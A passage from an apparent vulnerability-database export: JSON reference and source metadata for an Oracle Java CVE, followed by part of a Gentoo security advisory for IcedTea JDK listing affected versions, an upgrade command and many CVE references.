0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2398" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4227" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4252" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4244" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4262" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2490" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4208" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6492" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6512" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4264" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6466" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4288" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2483" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6485" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4223" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2397" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2428" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6502" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4268" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4218" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4220" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6506" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2413" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6515" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5896.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5887" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0878.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5910" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0428.html" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5910.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0982.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0417" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5878" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5907" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0376" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5899.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0368" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0416.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0428" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0403.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0422" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0368.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0415.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5889.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5884" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0375.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0423" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5878.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0376.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0410" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0410.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5898" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5889" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0424" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5907.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0373.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0411.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0416" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0424.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0373" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5888" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5898.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5884.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5899" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0403" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0375" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5887.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0387.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5896" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5888.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0387" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b31-1.13.3-1ubuntu1~0.10.04.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b31-1.13.3-1ubuntu1~0.12.04.2" }, { "trust": 0.1, "url": "http://www.hp.com/java" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://www.debian.org/security/" } ], "sources": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "BID", "id": "66914" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "126443" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "BID", "id": "66914" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "126443" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-16T00:00:00", "db": "VULHUB", "id": "VHN-67946" }, { "date": "2014-04-16T00:00:00", "db": "VULMON", "id": "CVE-2014-0453" }, { "date": "2014-04-15T00:00:00", "db": "BID", "id": "66914" }, { "date": "2014-04-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "date": "2014-05-14T15:09:44", "db": "PACKETSTORM", "id": "126611" }, { "date": "2014-04-17T22:02:41", "db": "PACKETSTORM", "id": "126200" }, { "date": "2015-02-16T17:24:02", "db": "PACKETSTORM", "id": "130400" }, { "date": "2014-07-29T22:17:21", "db": "PACKETSTORM", "id": "127655" }, { "date": "2014-05-02T06:40:40", "db": "PACKETSTORM", "id": "126443" }, { "date": "2014-08-20T15:19:26", "db": "PACKETSTORM", "id": "127938" }, { "date": "2014-04-25T17:49:43", "db": "PACKETSTORM", "id": "126320" }, { "date": "2014-04-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-268" }, { "date": "2014-04-16T01:55:09.713000", "db": "NVD", "id": "CVE-2014-0453" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-05-09T00:00:00", "db": "VULHUB", "id": "VHN-67946" }, { "date": "2020-09-08T00:00:00", "db": "VULMON", "id": "CVE-2014-0453" }, { "date": "2015-04-13T21:28:00", "db": "BID", "id": "66914" }, { "date": "2015-12-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "date": "2020-10-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-268" }, { "date": "2022-05-13T14:57:20.947000", "db": "NVD", "id": "CVE-2014-0453" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127938" }, { "db": "CNNVD", "id": "CNNVD-201404-268" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Oracle Java In product Security Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-002089" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-268" } ], "trust": 0.6 } }
var-201310-0613
Vulnerability from variot
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect availability via vectors related to JGSS. The vulnerability can be exploited over the 'Kerberos' protocol. This issue affects the 'JGSS' sub-component. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201406-32
http://security.gentoo.org/
Severity: High Title: IcedTea JDK: Multiple vulnerabilities Date: June 29, 2014 Bugs: #312297, #330205, #340819, #346799, #352035, #353418, #354231, #355127, #370787, #387637, #404095, #421031, #429522, #433389, #438750, #442478, #457206, #458410, #461714, #466822, #477210, #489570, #508270 ID: 201406-32
Synopsis
Multiple vulnerabilities have been found in the IcedTea JDK, the worst of which could lead to arbitrary code execution.
Background
IcedTea is a distribution of the Java OpenJDK source code built with free build tools.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/icedtea-bin < 6.1.13.3 >= 6.1.13.3
Description
Multiple vulnerabilities have been discovered in the IcedTea JDK. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All IcedTea JDK users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-java/icedtea-bin-6.1.13.3"
References
[ 1 ] CVE-2009-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555 [ 2 ] CVE-2010-2548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548 [ 3 ] CVE-2010-2783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783 [ 4 ] CVE-2010-3541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541 [ 5 ] CVE-2010-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548 [ 6 ] CVE-2010-3549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549 [ 7 ] CVE-2010-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551 [ 8 ] CVE-2010-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553 [ 9 ] CVE-2010-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554 [ 10 ] CVE-2010-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557 [ 11 ] CVE-2010-3561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561 [ 12 ] CVE-2010-3562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562 [ 13 ] CVE-2010-3564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564 [ 14 ] CVE-2010-3565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565 [ 15 ] CVE-2010-3566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566 [ 16 ] CVE-2010-3567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567 [ 17 ] CVE-2010-3568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568 [ 18 ] CVE-2010-3569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569 [ 19 ] CVE-2010-3573 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573 [ 20 ] CVE-2010-3574 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574 [ 21 ] CVE-2010-3860 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860 [ 22 ] CVE-2010-4351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351 [ 23 ] CVE-2010-4448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448 [ 24 ] CVE-2010-4450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450 [ 25 ] CVE-2010-4465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465 [ 26 ] CVE-2010-4467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467 [ 27 ] CVE-2010-4469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469 [ 28 ] CVE-2010-4470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470 [ 29 ] CVE-2010-4471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471 [ 30 ] CVE-2010-4472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472 [ 31 ] CVE-2010-4476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476 [ 32 ] CVE-2011-0025 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025 [ 33 ] CVE-2011-0706 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706 [ 34 ] CVE-2011-0815 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815 [ 35 ] CVE-2011-0822 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822 [ 36 ] CVE-2011-0862 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862 [ 37 ] CVE-2011-0864 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864 [ 38 ] CVE-2011-0865 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865 [ 39 ] CVE-2011-0868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868 [ 40 ] CVE-2011-0869 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869 [ 41 ] CVE-2011-0870 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870 [ 42 ] CVE-2011-0871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871 [ 43 ] CVE-2011-0872 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872 [ 44 ] CVE-2011-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389 [ 45 ] CVE-2011-3521 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521 [ 46 ] CVE-2011-3544 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544 [ 47 ] CVE-2011-3547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547 [ 48 ] CVE-2011-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548 [ 49 ] CVE-2011-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551 [ 50 ] CVE-2011-3552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552 [ 51 ] CVE-2011-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553 [ 52 ] CVE-2011-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554 [ 53 ] CVE-2011-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556 [ 54 ] CVE-2011-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557 [ 55 ] CVE-2011-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558 [ 56 ] CVE-2011-3560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560 [ 57 ] CVE-2011-3563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563 [ 58 ] CVE-2011-3571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571 [ 59 ] CVE-2011-5035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035 [ 60 ] CVE-2012-0497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497 [ 61 ] CVE-2012-0501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501 [ 62 ] CVE-2012-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502 [ 63 ] CVE-2012-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503 [ 64 ] CVE-2012-0505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505 [ 65 ] CVE-2012-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506 [ 66 ] CVE-2012-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547 [ 67 ] CVE-2012-1711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711 [ 68 ] CVE-2012-1713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713 [ 69 ] CVE-2012-1716 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716 [ 70 ] CVE-2012-1717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717 [ 71 ] CVE-2012-1718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718 [ 72 ] CVE-2012-1719 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719 [ 73 ] CVE-2012-1723 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723 [ 74 ] CVE-2012-1724 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724 [ 75 ] CVE-2012-1725 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725 [ 76 ] CVE-2012-1726 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726 [ 77 ] CVE-2012-3216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216 [ 78 ] CVE-2012-3422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422 [ 79 ] CVE-2012-3423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423 [ 80 ] CVE-2012-4416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416 [ 81 ] CVE-2012-4540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540 [ 82 ] CVE-2012-5068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068 [ 83 ] CVE-2012-5069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069 [ 84 ] CVE-2012-5070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070 [ 85 ] CVE-2012-5071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071 [ 86 ] CVE-2012-5072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072 [ 87 ] CVE-2012-5073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073 [ 88 ] CVE-2012-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074 [ 89 ] CVE-2012-5075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075 [ 90 ] CVE-2012-5076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076 [ 91 ] CVE-2012-5077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077 [ 92 ] CVE-2012-5081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081 [ 93 ] CVE-2012-5084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084 [ 94 ] CVE-2012-5085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085 [ 95 ] CVE-2012-5086 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086 [ 96 ] CVE-2012-5087 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087 [ 97 ] CVE-2012-5089 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089 [ 98 ] CVE-2012-5979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979 [ 99 ] CVE-2013-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169 [ 100 ] CVE-2013-0401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401 [ 101 ] CVE-2013-0424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424 [ 102 ] CVE-2013-0425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425 [ 103 ] CVE-2013-0426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426 [ 104 ] CVE-2013-0427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427 [ 105 ] CVE-2013-0428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428 [ 106 ] CVE-2013-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429 [ 107 ] CVE-2013-0431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431 [ 108 ] CVE-2013-0432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432 [ 109 ] CVE-2013-0433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433 [ 110 ] CVE-2013-0434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434 [ 111 ] CVE-2013-0435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435 [ 112 ] CVE-2013-0440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440 [ 113 ] CVE-2013-0441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441 [ 114 ] CVE-2013-0442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442 [ 115 ] CVE-2013-0443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443 [ 116 ] CVE-2013-0444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444 [ 117 ] CVE-2013-0450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450 [ 118 ] CVE-2013-0809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809 [ 119 ] CVE-2013-1475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475 [ 120 ] CVE-2013-1476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476 [ 121 ] CVE-2013-1478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478 [ 122 ] CVE-2013-1480 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480 [ 123 ] CVE-2013-1484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484 [ 124 ] CVE-2013-1485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485 [ 125 ] CVE-2013-1486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486 [ 126 ] CVE-2013-1488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488 [ 127 ] CVE-2013-1493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493 [ 128 ] CVE-2013-1500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500 [ 129 ] CVE-2013-1518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518 [ 130 ] CVE-2013-1537 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537 [ 131 ] CVE-2013-1557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557 [ 132 ] CVE-2013-1569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569 [ 133 ] CVE-2013-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571 [ 134 ] CVE-2013-2383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383 [ 135 ] CVE-2013-2384 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384 [ 136 ] CVE-2013-2407 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407 [ 137 ] CVE-2013-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412 [ 138 ] CVE-2013-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415 [ 139 ] CVE-2013-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417 [ 140 ] 